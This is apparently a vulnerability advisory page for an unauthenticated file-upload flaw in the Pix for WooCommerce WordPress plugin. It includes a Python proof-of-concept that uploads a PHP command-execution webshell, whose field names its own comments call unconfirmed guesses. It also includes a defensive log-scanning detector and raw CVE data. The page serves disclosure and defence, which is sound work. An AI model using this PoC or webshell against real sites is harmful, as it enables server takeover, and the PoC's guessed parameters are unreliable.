Security Vulnerability Report
CVE-2026-3891 CVSS 9.8 CRITICAL

CVE-2026-3891

Published: 2026-03-13 19:55:11
Last Modified: 2026-04-22 21:30:26

Description

The Pix for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing capability check and missing file type validation in the 'lkn_pix_for_woocommerce_c6_save_settings' function in all versions up to, and including, 1.5.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Pix for WooCommerce plugin <= 1.5.0 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2026-3891 PoC - Arbitrary File Upload in Pix for WooCommerce
# Target: WordPress site with vulnerable Pix for WooCommerce plugin (<= 1.5.0)
#
# NOTE: the advisory only names the vulnerable AJAX function
# ('lkn_pix_for_woocommerce_c6_save_settings'). The multipart field name, the
# setting parameters and the on-disk name of the uploaded file used below are the
# PoC author's guesses and are not confirmed by the referenced source
# (LknPaymentPixForWoocommercePixC6.php); verify them against the plugin code
# before relying on this script. The uploaded file name ('pix_config.php') and
# UPLOAD_PATH ('uploaded_pix_file.php') also do not match each other.

TARGET_URL = "http://target-wordpress-site.com"

# Site-relative path where the PoC expects the uploaded webshell to land
UPLOAD_PATH = "/wp-content/plugins/payment-gateway-pix-for-woocommerce/uploaded_pix_file.php"

# PHP webshell content
webshell = "<?php if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } ?>"


def exploit_file_upload():
    """Exploit arbitrary file upload vulnerability"""
    # admin-ajax.php dispatches on the 'action' parameter; the vulnerable handler
    # is reachable without authentication (missing capability check)
    endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"

    # Craft the malicious file upload request (no file type validation server-side)
    files = {
        'file': ('pix_config.php', webshell, 'application/x-php')
    }
    data = {
        'action': 'lkn_pix_for_woocommerce_c6_save_settings',
        'setting_name': 'pix_config',
        'lkn_pix_for_woocommerce_c6_setting1': webshell
    }

    try:
        print(f"[*] Sending exploit request to {endpoint}")
        response = requests.post(endpoint, data=data, files=files, timeout=30)
        if response.status_code == 200:
            # admin-ajax.php answers 200 even for unknown actions (body "0"),
            # so a 200 only means the request was accepted, not that the upload worked
            print("[+] Request sent successfully")
            # UPLOAD_PATH already starts with /wp-content/, so join it directly
            webshell_url = f"{TARGET_URL}{UPLOAD_PATH}"
            print(f"[+] Try accessing webshell at: {webshell_url}?cmd=whoami")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1].rstrip("/")
    exploit_file_upload()
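Defenders can work from the request shape the PoC produces. The script below is an added example written for this page, not code from the plugin vendor, from Wordfence or from the PoC author. It scans access-log lines in Combined Log Format extended with one extra quoted field carrying the POST body (a constructed format: stock Apache/nginx logs do not record bodies, so in practice the action name has to come from a WAF or application log), flags calls to the vulnerable admin-ajax action and direct requests for .php files under the plugin directory, and includes a version check against the advisory's affected range (<= 1.5.0). The sample log lines are constructed. Access logs do not show whether the caller was logged in, so every hit is a triage lead rather than proof of unauthenticated exploitation.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Identifiers taken from the advisory and PoC on this page.
VULN_ACTION = "lkn_pix_for_woocommerce_c6_save_settings"
PLUGIN_DIR = "/wp-content/plugins/payment-gateway-pix-for-woocommerce/"
LAST_AFFECTED = (1, 5, 0)   # "all versions up to, and including, 1.5.0"

# Combined Log Format plus an optional trailing quoted field holding the POST body.
# Constructed for this example; real web-server logs do not include bodies.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
    r'(?: "(?P<body>[^"]*)")?$'
)


def parse_version(text):
    """'1.5.0' -> (1, 5, 0); a suffix such as '-beta' is ignored."""
    core = text.strip().split("-", 1)[0]
    return tuple(int(part) for part in core.split("."))


def is_affected(version):
    """True when the installed plugin version is inside the advisory's affected range."""
    return parse_version(version) <= LAST_AFFECTED


def parse_log_line(line):
    """Parse one log line into a dict with path and admin-ajax action, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    split = urlsplit(rec["target"])
    rec["path"] = split.path
    # admin-ajax.php reads 'action' from either the query string or the body,
    # so merge both before looking it up.
    params = parse_qs(split.query)
    params.update(parse_qs(rec["body"] or ""))
    rec["action"] = params.get("action", [None])[0]
    return rec


def classify(rec):
    """Return an indicator label for one parsed request, or None if it is benign."""
    if rec["path"] == "/wp-admin/admin-ajax.php" and rec["action"] == VULN_ACTION:
        return "vulnerable_action_called"
    if rec["path"].startswith(PLUGIN_DIR) and rec["path"].endswith(".php"):
        # Plugin PHP files are loaded by WordPress, not fetched directly; a direct
        # request for one is how an uploaded webshell would be reached.
        return "direct_php_under_plugin_dir"
    return None


def find_indicators(lines):
    """Return (ip, label, path) for every log line matching an indicator."""
    hits = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        label = classify(rec)
        if label:
            hits.append((rec["ip"], label, rec["path"]))
    return hits


# Constructed sample log lines (not real traffic); 198.51.100.7 plays the attacker.
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Mar/2026:20:01:12 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 1 "-" "python-requests/2.31.0" "action=lkn_pix_for_woocommerce_c6_save_settings&setting_name=pix_config"',
    '198.51.100.7 - - [13/Mar/2026:20:01:15 +0000] "GET /wp-content/plugins/payment-gateway-pix-for-woocommerce/uploaded_pix_file.php?cmd=whoami HTTP/1.1" 200 15 "-" "python-requests/2.31.0"',
    '203.0.113.9 - - [13/Mar/2026:20:02:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 1 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [13/Mar/2026:20:02:05 +0000] "GET /wp-content/plugins/payment-gateway-pix-for-woocommerce/assets/pix.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, label, path in find_indicators(SAMPLE_LOG):
        print(f"{ip}  {label:28s} {path}")
    print("1.5.0 affected:", is_affected("1.5.0"), "| 1.5.1 affected:", is_affected("1.5.1"))
```

Running the script on the sample lines reports the attacker's action call and the follow-up fetch of the .php file, and nothing for the benign heartbeat and stylesheet requests. Where a site legitimately serves a plugin PHP file directly, add that path to an allow-list before using the second indicator for alerting.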

References

https://plugins.trac.wordpress.org/browser/payment-gateway-pix-for-woocommerce/tags/1.4.0/Includes/LknPaymentPixForWoocommercePixC6.php#L694
https://plugins.trac.wordpress.org/changeset/3480639/payment-gateway-pix-for-woocommerce#file56
https://www.wordfence.com/threat-intel/vulnerabilities/id/20188fd3-c330-4c76-912b-72731e14c450?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-3891",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-13T19:55:10.983",
    "lastModified": "2026-04-22T21:30:26.497",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "The Pix for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing capability check and missing file type validation in the 'lkn_pix_for_woocommerce_c6_save_settings' function in all versions up to, and including, 1.5.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible."},
      {"lang": "es", "value": "El plugin Pix for WooCommerce para WordPress es vulnerable a la carga arbitraria de archivos debido a la falta de verificación de capacidades y la falta de validación del tipo de archivo en la función 'lkn_pix_for_woocommerce_c6_save_settings' en todas las versiones hasta la 1.5.0, inclusive. Esto permite a atacantes no autenticados cargar archivos arbitrarios en el servidor del sitio afectado, lo que podría posibilitar la ejecución remota de código."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-434"}]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/payment-gateway-pix-for-woocommerce/tags/1.4.0/Includes/LknPaymentPixForWoocommercePixC6.php#L694", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3480639/payment-gateway-pix-for-woocommerce#file56", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/20188fd3-c330-4c76-912b-72731e14c450?source=cve", "source": "[email protected]"}
    ]
  }
}